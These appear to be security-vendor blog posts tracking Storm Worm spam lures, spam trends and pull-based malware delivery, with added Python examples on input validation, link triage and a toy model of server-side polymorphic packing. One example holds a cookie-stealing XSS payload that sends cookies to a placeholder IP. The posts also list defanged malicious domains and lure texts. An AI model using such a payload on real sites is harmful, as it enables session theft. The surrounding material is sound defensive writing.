| Microsoft | 1.3408 | 2008.04.21 | TrojanDropper:Win32/Nuwar.gen!lds |
| NOD32v2 | 3043 | 2008.04.21 | - |
| Norman | 5.80.02 | 2008.04.18 | - |
| Panda | 9.0.0.4 | 2008.04.20 | - |
| Prevx1 | V2 | 2008.04.21 | - |
| Rising | 20.41.02.00 | 2008.04.21 | - |
| Sophos | 4.28.0 | 2008.04.21 | Mal/Generic-A |
| Sunbelt | 3.0.1056.0 | 2008.04.17 | - |
| Symantec | 10 | 2008.04.21 | - |
| TheHacker | 6.2.92.285 | 2008.04.19 | - |
| VBA32 | 3.12.6.4 | 2008.04.16 | Trojan.Win32.Revelation |
| VirusBuster | 4.3.26:9 | 2008.04.21 | - |
| Webwasher-Gateway | 6.6.2 | 2008.04.21 | Trojan.Crypt.XPACK.Gen |
Fake video downloads and updates have been a pretty common theme for the Storm Worm folks for quite some time now. This "news story" social engineering tactic is what Storm originally used to get most people infected back in January, 2007, so many people have already "been there, done that" which is likely why infection rates are staying pretty low.
Never to rest on their laurels, the Storm Worm gang brings us yet another new twist in how they are trying to get you to infect your PC.
This new Storm variant follows in the footsteps of the Google Spam with a purported video download that I blogged about on April 3rd except that Storm is trying to convince you that you want to view a new music video that has just been released.
Here is an example of one of the messages that came into our Threat Operations Center:
Eagles just made a new video. See it here before it releases. Cut and
paste the link in your browser to get the video:
hxxp://zbrkfdxd[deleted].blogspot.com
All of the examples that we have seen thus far have been random subdomains off of blogspot.com, a popular, free blog hosting site. When the link in the email is clicked you are immediately redirected to hxxp://giftapplys.cn (registered on April 8th) which serves up the below page:
Both the fake video player and the "Download it" link point to the malware download. Interestingly, the video player points to a file named StormCodec.exe while the Download It link points to a file named StormCodec8.exe, but the two have the same MD5 checksum (2f16017932e729b8a9f1f5c07eec9b99), so despite the different names they are the same file.
We've only seen about 50,000 of these messages over the last 24 hours (I say "only" because many Storm Worm variants are in the millions within their first day) so this tactic isn't too popular at the moment, but is new and different from previous tactics so is definitely something to keep on the lookout for.
I'm sure nobody saw this coming (tongue firmly lodged in cheek), but the folks that have brought us Storm Worm variants like e-cards and Christmas Greetings have brought us a Valentine's Day variant just in time for the February 14th holiday.
Traffic that we have seen thus far in relation to this worm peaked during the 1am and 2am (mountain standard time) hours this morning and has been steadily dropping ever since, but I have a hard time believing that this trend will continue with Valentine's Day still two days away!
This new variant follows the same paradigm as the ones that we have seen previously: Subject line and message body related to the upcoming holiday and a random link which points the user to a web site where they download an executable (like valentine.exe) and get infected. Nothing new.
Some of the subject lines that we have seen in relation to this worm include:
Is Anything Beautiful As A Rose?
You're my Velentine! (note the misspelling)
You Stay In My Heart
Smiley Kiss
Sample message bodies may contain the same text as the subject line. We've seen some variation here, but it looks like the subject lines and message text are drawn from roughly the same static list.
Playing on emotion and holiday themes continues to be a successful social engineering tactic for the Storm Worm gang, and will continue to be popular until such time as it ceases to be effective. As with all of the other variants, don't get hit by this Cupid's arrow. There is no love to be found here!
According to this article at internetnews.com, American and Russian law enforcement agencies know who is behind the creation of the Storm Worm.
The article goes into detail on the difficulties of extradition to the United States if American officials request it so I won't belabor that point here.
What is important is whether or not this could mean the end of the Storm Worm. Unfortunately not. We already know from research done by Joe Stewart that recent variants of the Storm Worm encrypt their P2P traffic with a key, which effectively partitions the botnet into segments whose members share that key and can only talk to each other. This means that these segments could be sold off and used for whatever purposes the buyer wanted: more spam, different malware, etc. If the Storm Worm code is also made available, then there is nothing stopping Storm from living on.
Even scarier is the notion that we have seen the evolution of malware and it only gets nastier and nastier with one idea building off the previous. So, even if we don't see additional specific Storm Worm variants if/when the authors are arrested, the concepts and code will certainly live on and take on new shapes in the next popular malware strains.
I have to admit that as much as I am tired of talking about the Storm Worm, it keeps giving such great fodder for discussion. Over the past year we have seen fake video clips for current events and e-cards. Now Storm has expanded its horizons and has started sending out one-liner spam with the prospect of a better life between the sheets.
Some of the sample subject lines that we have seen from this new Storm variant include:
-- why you're so unhappy with your bedroom life?
-- Ladies and Gents want to have perfect nights!
-- Become a super-lover-2008!
-- What you will learn from us will change your sensual life for better!
All of the samples that we have received have had one-liner spam where the message body is sometimes the same as the subject line (many times not) followed by a URL pointing to a random IP address like hxxp://61,79,172,152/rqokyj/ (modified so you can't actually click the link).
As if we don't see enough health related spam already, now Storm has jumped on the bandwagon as well. I guess if it works for the spammers...
In keeping with form the gang responsible for the Storm Worm (and its many variants) has been releasing updates to correspond with the New Year holiday coming up next Tuesday (they also released some Christmas joy as well on Christmas eve for those who wanted early "presents").
They've been changing domains linked to in the email that is directing you to the malware download. So far we have seen:
happycards2008.com
newyearcards2008.com
happynewyearcards2008.com
uhavepostcard.com
All of the above sites are currently active except for happynewyearcards2008.com which appears to be offline.
If the link in the email is clicked it takes you to a site which tells you that your download will begin shortly (in the background it is probing your browser for vulnerabilities to exploit) and that if the download doesn't start you should click to download the file manually. When that link is clicked the malware is downloaded, and the user infects themselves by running it. This is akin to other Storm Worm variants which operated in a similar fashion.
The downloaded file is changing names also. Currently the file is happynewyear2008.exe, but previous variants have downloaded happy2008.exe, happy-2008.exe, and happynewyear.exe.
Have a Happy New Year, but don't party with the Storm Worm Gang!
I realize that I have been a bit lax in my posting over the past couple of weeks with the holidays and having been sick for a goodly amount of time (is any time that you are sick really "good" time?) as well. I thought I would take some time to attempt to bring 2007 to a close with a wrap up of what we have seen this year. I'll probably make some references to our 2008 predictions blog posting as well since some of what we have seen this year will carry over to next and beyond.
2007 will most certainly be known in the anti-spam and anti-malware worlds as the year of the Storm Worm. From late January when Storm was first discovered all the way through the end of the year where even up to this weekend we continued to see additional Christmas e-card variants popping up, Storm Worm volumes not only eclipsed every other piece of malcode that we saw in our Threat Center, but it also surpassed volumes seen previously only by the outbreaks of the Sober worm back in 2005. Since the Storm Worm has been so adept at refining its social engineering tactics and has primarily been releasing new variants around major events like holidays, expect this to continue into 2008 likely morphing into political spam as the presidential races continue to heat up.
Speaking of social engineering, we saw several refinements this year not only in how it is used as a lure to attempt to get a user to open a message, but in how spam mail itself is targeted. Starting in late May and continuing through June (there was another that popped up in December also) spammers were forging emails purporting to be from government agencies like the FTC and non-profits like the Better Business Bureau in an attempt to make the message look like a complaint was being filed against the target company. What made these messages so unique and effective is that they were targeted and sent directly to C-level executives. If the target opened the attachment/clicked the link within the message body they were infected with a keylogger which would log any information input into the infected machine and upload it to a web site where cyber criminals were then selling that information for profit.
We also saw a significant shift away from image based spam, a tactic that had been prevalent in larger volumes since December, 2005. Image spam had been the big spam story throughout all of 2006 and even into the early parts of 2007, reaching almost 40% of spam volumes in April of this year. As it reached its peak, however, it quickly started to decline. As image spam waned, we saw the dawn of a new spam: PDF spam!
PDF spam forced the industry to react quickly and make sure that it was treating messages as holistic entities examining not only message headers and body content, but the content of attachments to ensure that spam content was not being hidden in there.
Although PDF spam volumes were short lived, they highlighted the rapid movement away from image spam to the point where image spam is currently less than 3% of all spam volume that we see. PDF spam also introduced additional challenges that image spam did not. Not only were messages larger due to the existence of the PDF attachment (this was a similar characteristic of what we saw with image spam so at least this in itself did not introduce any new challenges), but since PDFs need to be scanned for potential malcode they required the additional system resources of a virus scan. Many more CPU cycles were being chewed by processing PDF spam as opposed to its image based predecessor. PDF spam lasted in large quantities for only about a month.
As PDF spam waned we have been seeing some minimal increases in other types of attachment based spam with spam sometimes appearing within the body of a Word doc or an Excel spreadsheet. Volumes of this type of spam are still quite low, but could easily be leveraged for a wide scale attack similar to how PDF spam was used. Most of the tactics now have gone back to what I call "old school" style spam where spammers have been resorting back to text obfuscations in an effort to get their junk through spam filters.
So, as you can see, a lot has happened in 2007 and the forecast for 2008 looks to bring about some new challenges as these existing threats evolve and as new ones emerge. If you'd like some more information on what we expect to see next year and forward, feel free to read my 2008 predictions blog. In the meantime, here's to hoping everyone has a safe and wonderful holiday season.
As we near the end of another year I can say with surety that 2007 will be remembered among spam and malware filtering companies as the year of the Storm Worm. In 2005 it was the year of the Sober worm, but 2007 has most definitely been owned by Storm and its many variants.
So, as we close out 2007 we start to look forward to 2008. What are some of the 2007 trends that we expect to continue in 2008? What will be new? How will current trends evolve?
Here are some of my random thoughts:
-- We will see an increased prevalence of Web 2.0 attacks.
When we talk about "Web 2.0" we are talking mostly about interactive communities like blogs, wikis, and social networking sites like MySpace and Facebook. Web 2.0 sites provide a richer, more interactive internet experience for its users which extends the internet beyond just your typical "download content and view pages" approach and puts users in more control over the content.
From a user experience perspective, this is a great idea, but typically what makes things easier for the user carries along with it some level of security implication.
As part of the Web 2.0 experience, more code execution is being pushed to the client browser. This doesn't necessarily change the types of attacks that exist in Web 2.0 applications versus Web 1.0 applications (attacks like XSS, SQL Injection, and CSRF still exist just as they did before), but they will now manifest themselves in different ways. As such it is the application developer's responsibility to treat everything that arrives from the browser as untrusted: client-side input validation improves the user experience, but anyone can skip it by sending a request by hand, so the same validation must be enforced again on the server and output must be encoded before it is rendered, so that potentially malicious code never makes it from the "untrusted" user environment into a site's "trusted" backend infrastructure or back out into other users' browsers. Cyber criminals will try to exploit gaps in that validation as much as possible.
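As an added illustration of that point (example code written for this post, not code from any site mentioned here), the following Python models a comment feature two ways: validation done only in the browser, and the same rule enforced on the server with the output HTML-encoded. The "browser" and "server" are plain functions so it runs offline; the comment samples, the allowed-character rule and the 192.0.2.10 address (from the RFC 5737 documentation range) are all constructed for the example.

```python
import html
import re

# What the page's JavaScript would accept: letters, digits, whitespace, basic punctuation.
# This rule is an assumption made for the example.
ALLOWED = re.compile(r"[\w\s.,!?'-]{1,200}")


def browser_submit(comment):
    """Client-side check as a well-behaved browser runs it; returns the POST body or None.

    An attacker never calls this: they build the POST body themselves.
    """
    return comment if ALLOWED.fullmatch(comment) else None


def server_store_trusting(post_body, db):
    """Anti-pattern: assumes the browser validated, so a hand-crafted POST goes straight in."""
    db.append(post_body)


def server_store_validating(post_body, db):
    """The same rule enforced on the server, the one copy an attacker cannot skip."""
    if not ALLOWED.fullmatch(post_body):
        raise ValueError("rejected on the server")
    db.append(post_body)


def accepted_by(store, post_body):
    """Does this server handler end up storing the body?"""
    db = []
    try:
        store(post_body, db)
    except ValueError:
        return False
    return db == [post_body]


def render_unescaped(comments):
    """Output as many apps did it: stored text dropped straight into the page."""
    return "".join(f"<p>{c}</p>" for c in comments)


def render_escaped(comments):
    """Output with HTML encoding, so stored text can never become markup or script."""
    return "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in comments)


# Constructed attacker input: a cookie-stealing script the browser-side check would refuse.
XSS = "<script>document.location='http://192.0.2.10/?c='+document.cookie</script>"
```

With the trusting handler, `accepted_by(server_store_trusting, XSS)` is true even though `browser_submit(XSS)` returns None, and `render_unescaped([XSS])` puts the script tag into every visitor's page; the validating handler refuses the body, and `render_escaped` neutralises anything that does get stored.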
-- We will see an increase in "blended threats" in 2008.
If you are not familiar with the term "blended threat" it is a combination type of threat which will mix the data stealing capabilities of malware with backdoor botnet capabilities. What this means is that if you are infected with one of these hybrid types of malware you could have a keylogger installed on your machine which is logging your keystrokes and sending your potentially confidential and personally identifiable information to a cyber crook for sale in the underground community, but your machine is also available as a spam zombie such that botnet herders can rent time on your computer to send out spam/viruses/etc.
The holiday season is a particularly interesting time to potentially see these types of threats also because of the amount of online shopping that takes place in the 5 weeks between Thanksgiving and Christmas. comScore recently released their Cyber Monday 2007 Statistics which showed that $733 million dollars was spent online on Cyber Monday (the Monday after the Thanksgiving weekend) alone. This is obviously a target that is too large for criminals to ignore.
-- Abuse will continue to move into other forms of communication
We've already seen some of this in 2007, but is something that we expect to continue not only into 2008 but beyond.
Mobile phone and PDA abuse is already a big problem in places like Europe and Japan. It isn't so much so yet in the United States, but as smartphones make more of a movement into the space where they allow the development and installation of third party applications users will need to be continually wary of the security implications of these new conveniences. The line between the PC and the phone is becoming blurrier every day and as such mobile computing devices will soon need to deploy the same types of security suites that should be installed on every desktop and laptop PC.
We also expect to see more tele-spam (spam sent via VoIP technologies) and voicemail injection (the compromising of vulnerable VoIP systems to inject spam voicemail directly into a user's voicemail inbox).
In the vein of "targets too large for criminals to ignore" the smartphone industry is expected to be a $250B industry by 2011. You can be sure that cyber criminals will do whatever they can to get a piece of that pie!
-- Continued movement of malware away from email as a primary distribution vector.
This is another one of those trends that we have seen shift over the past year or two. Malware authors have already begun the movement from the "push" based method of infection that we have talked about previously (where static malware content is pushed to the user via an email attachment) to a "pull" based model where users pull the content from a web site, typically lured to by a link in either an email or an instant message.
The Storm Worm is actually a great example of this transition in action. Early versions of the Storm Worm pushed executable file attachments to unsuspecting users when opened would infect the user's PC with Storm. Later variants used social engineering tactics like fake, malicious e-cards to lure people to web sites to download more dynamic pieces of malware.
More and more viruses have been following this trend over the last year or two and we expect this trend to continue. By 2009 or 2010 we expect malware distribution by internet pull based methods to surpass email as a distribution vector making it the primary method of infection. The email virus is likely to never completely go away, but the dynamic nature of the web as a way to distribute malware carries many advantages that email's static nature does not.
-- More targeted phishing/malware attacks
What discussion about social engineering would be complete without a mention of the evolution of tactics by cyber criminals in an effort to establish legitimacy with their targets?
Social engineering has always been the key ingredient to the success or failure of any cyber crime campaign. If you can do it well, you will have a significant greater chance of success than if you don't. The Storm and Sober worms (the last two really successful email-borne malware campaigns) were successful because of the social engineering tactics they used (Paris Hilton videos, free World Cup tickets, and e-cards as a few examples). As cyber criminals continue to launch new campaigns, you can be certain that they will refine their social engineering tactics to the point where even the trained eye will have trouble quickly determining the (il)legitimacy of an email.
These attacks will also become more targeted, similar to the government agency scams from earlier this year that were sent primarily to C-level executives. Effective social engineering combined with good targeting virtually ensures that there will always be people who fall for these scams, which will keep spam a virtually guaranteed profitable venture.
Machines infected with the Storm Worm now have a new way to deliver spam to their owners: browser popup spam!
Joe Stewart, a security researcher for Secureworks, has been actively tracking the Storm Worm and its activities for quite some time now and has posted this image with a sample of the spam that users are receiving.
The scam is for stock symbol HPGI which is for a company named Hemisphere Gold. This stock was actually the target of a pump and dump email spam run which started a couple of days ago.
You can track the spam volumes sent out for this particular stock here.
You can track the ups and downs of the stock price here.
So, now you're thinking "Well, now I'll know if my PC is infected with Storm. I can just run my virus scanner and it'll be removed! What a dumb move on the part of the Storm authors!" Unfortunately, this won't work. One of the elements of Storm is that it contains a rootkit component which embeds itself into Windows drivers that handle primary operating system functions. You can't just delete these files because then you will be removing system files that Windows needs to run.
There are applications which will look for and detect rootkits on your system, but it is unknown at this time whether or not those products have been updated to detect new Storm variants. Even if they detect this variant, Storm is very nimble and updates itself regularly; a tool that can identify and remediate one variant has not necessarily caught them all.
Just like 2005 was the year of the Sober worm, 2007 will be known as the year of the Storm Worm (and likely well into 2008 until something else comes along which is even more dastardly than Storm, which is a very scary concept!). This example is just another data point for the theory that email is most certainly not the only threat vector anymore and that it is only a matter of time before the web passes email as the primary malware delivery vehicle.
As a follow up to the Halloween Storm Alert that we posted back on October 31st, it appears that we are seeing more of these dancing skeleton emails today. In fact, we have already seen about 4 times the volume of this Storm Worm variant today (at 2:30pm MST) than we saw all of Halloween day (over 4 million so far today, about 1 million on Halloween and only a few thousand per day in between).
Looks like the dancing skeleton enjoyed the first dance so much he came back for an encore.
In keeping with their trend of releasing new variants on or around holidays (at least here in the US), the Storm Worm folks have released yet a new Halloween variant.
This new variant has a Halloween related subject line like "Nothing is funnier this Halloween" and a message body such as "Come watch the little skeleton dance" followed by a URL where the Storm malware can be downloaded.
This blog post will be updated as more information becomes available.
Update 1: Here are some additional subject lines associated with this new variant:
To much fun
Show this to the kids
Make him dance
Watch him dance
Dancing Bones
Dancing skeleton
Happy Halloween
Halloween Fun
Have a Happy Halloween everyone
Party on this Halloween
For people with a sense of humor only
Send this to your friends
I am sending this to everyone
I played with this for hours
If your in your office, keep the speakers low
This will make you laugh
You'll laugh your but off
Man this is funny
Riding on the wave of popularity of e-card variants related to the Storm Worm, we now have another one to add to the mix: The Laughing Kitty.
Similar to other Storm Worm e-card variants the subject lines looks fairly innocuous in an attempt to get the recipient to open the message. Some subject lines that we have seen include:
"Someone is thinking of you! Open your ecard!"
"Have you seen this hilarious greeting?"
"Someone Just sent you an ecard!"
"You have one new ecard waiting!"
"This greeting's for you!"
The body text of the message contains text such as:
"You have been sent the Laughing Kitty kard"
"Click here to view your laughing kitty card online."
"Preview your Kitty card online. It is so funny!"
The message contains a link where the user will be prompted to download a file called "superlaugh.exe" which contains Storm malware code.
Rest assured that there is nothing funny about the laughing kitty.
Storm and its many variants have easily been the largest malware outbreak since the Sober worm in 2005, and at this point Storm has dwarfed it in botnet size, observed traffic volumes, and staying power.
Storm worm variants have been reported to have infected up to 50 million PCs worldwide. Thanks to its effective social engineering techniques and enormous botnet power at its disposal we expect it to continue to be a major player for some time to come continuing to send spam, additional Storm malware, DDoS attacks, and more!
We've been talking quite a bit lately about the move from "push" based malware to "pull" based. So I figured it was time to dedicate a full blog posting to it and its significance.
Again, pull based malware is generally web site hosted malware where the user "pulls" the content from the web site by virtue of visiting the site with their web browser.
This type of malware is especially dangerous for a couple of reasons:
-- It evades attachment filtering techniques (there is no email attachment; the content comes via a web site link)
-- The user generally has no idea that the site they visited is malicious
-- Hackers can employ technologies like server side polymorphism to repack binaries for every download, thus rendering traditional signature based anti virus engines useless
We are starting to see more and more instances of common web site compromises where users can get infected without any lure (for example the 1st Congressional District GOP of Wisconsin was reported as compromised about a week ago by the same group that brought us the Storm Worm). In general, however, these types of infections are still the exception, not the norm.
Speaking of the Storm Worm gang, they have actually created a hybrid between push and pull infections for some of their variants. These will look for a number of unpatched vulnerabilities on a victim's PC when launched and if it can't find any that it is looking for will direct the user to download and install the file manually. Even Vista's UAC system only provides rudimentary protection here. Since applications executed directly by the end user are considered trusted (Vista will ask you if you are sure you want to install the program, but who doesn't just click "Yes" to that prompt?) the user falls on their own sword and infects themselves. Nice, eh?
Typically when a user is being lured to a malicious web site multiple communication mediums are leveraged. Something has to let the user know that the site is available and accessible, right? That lure in many cases comes via email.
There is a distinct crossover between email and web defense solutions such that the data collected from one can be used to make the other more effective, creating a synergistic relationship between the systems. At least for the foreseeable future hackers are going to have to continue to use technologies like email in an attempt to get users infected. During that time, having a solution which not only monitors and protects your inbound mail flow but also your outbound web browsing activities provides an effective defense-in-depth solution against malware and fraud.
Another day, another Storm worm tactic.
This new tactic leverages YouTube links in an effort to get users to click and download malicious code. The link sent via email looks like a properly formatted YouTube URL, but actually points at a compromised web server. The link uses a numeric IP address instead of a hostname, which avoids DNS altogether: a domain name can be suspended at the registrar, whereas an address on a compromised server is harder to take down.
This is another example of pull based malware that we have been talking about more and more where the user has to go visit a web site (either by clicking a link or following instructions to go to a particular web site) in order to get infected as opposed to having the malware "pushed" to them via an email attachment.
This method of infection also forced the AV vendors to start employing URL based blacklists into their products such that malicious web sites can be proactively identified by the AV engine based on the web site address and not necessarily based on the hosted content. This is a good move on their part especially considering the increase (and expected continued prevalence) in server side polymorphic viruses.
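The link checks a mail gateway can make before anyone clicks, as an added Python example (not MX Logic's code), serving this post and the earlier one on the Google redirector spam: it refangs the hxxp:// form used in these posts, follows a google.com/pagead-style redirector to its adurl target without touching the network, flags links whose host is a bare IP address, and flags anchors whose visible text names one host while the href goes to another. The message samples are constructed for the example: lure.example stands in for the real landing domain, the addresses are from the RFC 5737 documentation range, and all function names are this example's own.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Hosts whose click-tracking links carry the real destination in a query parameter.
REDIRECTOR_HOSTS = {"google.com", "www.google.com"}
REDIRECT_PARAMS = ("adurl", "url", "q")
URL_RE = re.compile(r"\b(?:hxxp|http)s?://\S+", re.IGNORECASE)


def refang(url):
    """Turn a defanged hxxp:// link (as printed in reports) back into a parseable URL."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url.strip(), flags=re.IGNORECASE)


def unwrap_redirector(url):
    """Resolve a google.com/pagead-style redirector to its adurl target, offline."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host in REDIRECTOR_HOSTS:
        query = parse_qs(parsed.query)
        for name in REDIRECT_PARAMS:
            if name in query:
                return query[name][0]
    return url


def is_bare_ip(host):
    """True when the host part is a literal IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_links(body):
    """(href, visible text) pairs; a plain-text body shows the URL itself as the text."""
    if "<a " in body.lower():
        collector = _AnchorCollector()
        collector.feed(body)
        return collector.links
    return [(m.group(0), m.group(0)) for m in URL_RE.finditer(body)]


def triage_link(href, visible_text):
    """Return the reasons a link is suspicious; an empty list means nothing fired."""
    reasons = []
    url = refang(href)
    final = unwrap_redirector(url)
    host = (urlparse(final).hostname or "").lower()
    if final != url:
        reasons.append(f"redirector: {urlparse(url).hostname} hands off to {host}")
    if is_bare_ip(host):
        reasons.append(f"bare IP host: {host}")
    shown = visible_text.strip().lower()
    if shown.startswith(("http://", "https://", "hxxp://", "hxxps://")):
        shown_host = (urlparse(refang(visible_text)).hostname or "").lower()
        if shown_host and shown_host != host:
            reasons.append(f"visible text says {shown_host}, link goes to {host}")
    return reasons


def triage_message(body):
    """Map each link in a message body to its list of triage reasons."""
    return {href: triage_link(href, text) for href, text in extract_links(body)}


# Constructed samples modelled on the lures in these posts (placeholder domain, RFC 5737 IPs).
SAMPLES = {
    "news_usa": (
        "Special issue of news from Reuters! Urgent Dangerous News!\n"
        "hxxp://www.google.com/pagead/iclk?sa=l&ai=PBXCNHM&num=03311"
        "&adurl=http://lure.example/news_usa.php\n"
    ),
    "youtube": (
        '<p>Check this out: <a href="http://192.0.2.10/watch.php?v=fQ2A">'
        "http://www.youtube.com/watch?v=fQ2A</a></p>"
    ),
    "benign": '<p>See <a href="https://www.example.org/report">https://www.example.org/report</a></p>',
}
```

Running `triage_message` over each sample gives two reasons for the news_usa link (the redirector hand-off to lure.example, and a visible google.com host that does not match the landing host), two for the YouTube-lookalike (bare IP, and visible youtube.com text over a 192.0.2.10 href), and none for the benign link. A URL blocklist of the kind the AV vendors adopted slots in naturally as one more check on `host` after the redirector has been unwrapped, since the host that matters is the one that actually serves the file.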
Just like 2005 was the year of the Sober worm, 2007 will be known as the Year of the Storm.
Since late January we have seen Storm worm variants using social engineering tactics like news stories, current events, and e-cards in an attempt to get unsuspecting victims to open attachments, click links, and get infected to become the latest addition to the Storm Worm bot army.
The latest and greatest social engineering tactic that we started seeing on Saturday has now started using porn. This tactic, as with the e-card tactic, is using a pull based method of infection where the malware content is not "pushed" to the user via an attachment, rather the email sent contains a link where when clicked by the user causes them to "pull" it down.
The messages that we have been seeing with this new variant include the following either in the subject line or message body (this is only a partial list): "I need someone to please me. Check out my pictures", "Want me to show you what my room mate and I do when we get lonely at night", and "Taking these pictures made me so hot. I bet they will make you hot too" (I'll bet this post gets caught by a few spam filters :) ). This new variant is currently accounting for about 1 in 6 virus infected messages seen by the MX Logic Threat Operations Center within the last 24 hours.
So, why the movement to "pull" based malware instead of "push" based? For one, it is more difficult for end users to submit samples of the malware. If the attachment is pushed to the end user, they have everything they need at their fingertips to submit to the anti-virus vendors. Secondly, with the pull based model users may not even know that they are going to a malicious web site: when they visit the site it may display some kind of error message saying that the site is not available (or something equally innocuous so as not to arouse suspicion) while in the background the user's PC gets infected with malware. This model also enables the malware authors to use a tactic known as "Server Side Polymorphism", where the way the malware is packed changes on a per download basis, rendering traditional signature based anti-virus engines ineffective. The version of the malware that I download could have an entirely different signature than the version someone else downloads even though we may have clicked through to the site at the exact same time.
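A toy model of server-side polymorphism, added here as an example (it is not Storm's packer and not MX Logic's code): the "server" re-packs the same payload for every download with a fresh XOR key behind a random-length stub, so a file hash or byte-pattern signature taken from one download misses the next, while a check that undoes the known packing before matching still catches every copy. It also reproduces the non-polymorphic case from the StormCodec post, where two differently named downloads share one MD5 because they are byte-identical. Everything is constructed: the payload is an inert placeholder string, the packing format is invented for the example, and MD5 is used only because that is what the post reports.

```python
import hashlib
import os
import struct

# Constructed stand-in for the served executable; it is inert text, not malware.
PAYLOAD = b"MZ\x90\x00 placeholder payload standing in for StormCodec.exe (constructed)"
SIGNATURE = b"placeholder payload"   # a byte pattern an AV engine might extract from one sample
MAGIC = b"SSP1"                      # header of this example's invented packing format


def pack(payload, key=None, stub_len=None):
    """Server side: XOR the payload with a per-download key and hide it behind a random stub."""
    key = key if key is not None else os.urandom(8)
    stub_len = stub_len if stub_len is not None else 16 + os.urandom(1)[0]
    stub = os.urandom(stub_len)
    body = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    header = MAGIC + struct.pack("<BH", len(key), stub_len)   # loader needs both lengths
    return header + key + stub + body


def unpack(blob):
    """What an unpacker or emulator does: reverse the packing to recover the real payload."""
    if blob[:4] != MAGIC:
        raise ValueError("not a sample in this packing format")
    key_len, stub_len = struct.unpack("<BH", blob[4:7])
    key = blob[7:7 + key_len]
    body = blob[7 + key_len + stub_len:]
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(body))


def serve(downloads):
    """Simulate N victims fetching the same URL: each receives a freshly packed copy."""
    return [pack(PAYLOAD) for _ in range(downloads)]


def static_serving(filenames):
    """The non-polymorphic case: one packed blob offered under several names."""
    blob = pack(PAYLOAD, key=b"\x5a" * 8, stub_len=16)
    return {name: blob for name in filenames}


def md5(data):
    return hashlib.md5(data).hexdigest()


def hash_signature_hits(samples, known_hash):
    """How many samples a hash taken from one download would catch."""
    return sum(1 for s in samples if md5(s) == known_hash)


def pattern_hits(samples, unpack_first=False):
    """How many samples a byte-pattern signature catches, with or without unpacking first."""
    return sum(1 for s in samples if SIGNATURE in (unpack(s) if unpack_first else s))
```

For five polymorphic downloads, `hash_signature_hits(samples, md5(samples[0]))` is 1 and `pattern_hits(samples)` is 0, while `pattern_hits(samples, unpack_first=True)` is 5: the signature is fine, it is just being applied to the wrong bytes. For `static_serving(["StormCodec.exe", "StormCodec8.exe"])` both names hash identically, which is the situation the StormCodec post describes.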
We've been seeing more examples of pull based malware over the last couple of months, mostly related to the Storm worm but the BBB scam from a couple of months ago used this method as well. Pull based infection provides much greater flexibility for the malware authors in their attempts to stay one step ahead of the anti-virus engines and is something we will continue to see not only from Storm, but from other worm authors who learn from Storm's successes in their attempts to come up with new methods to get onto our PCs.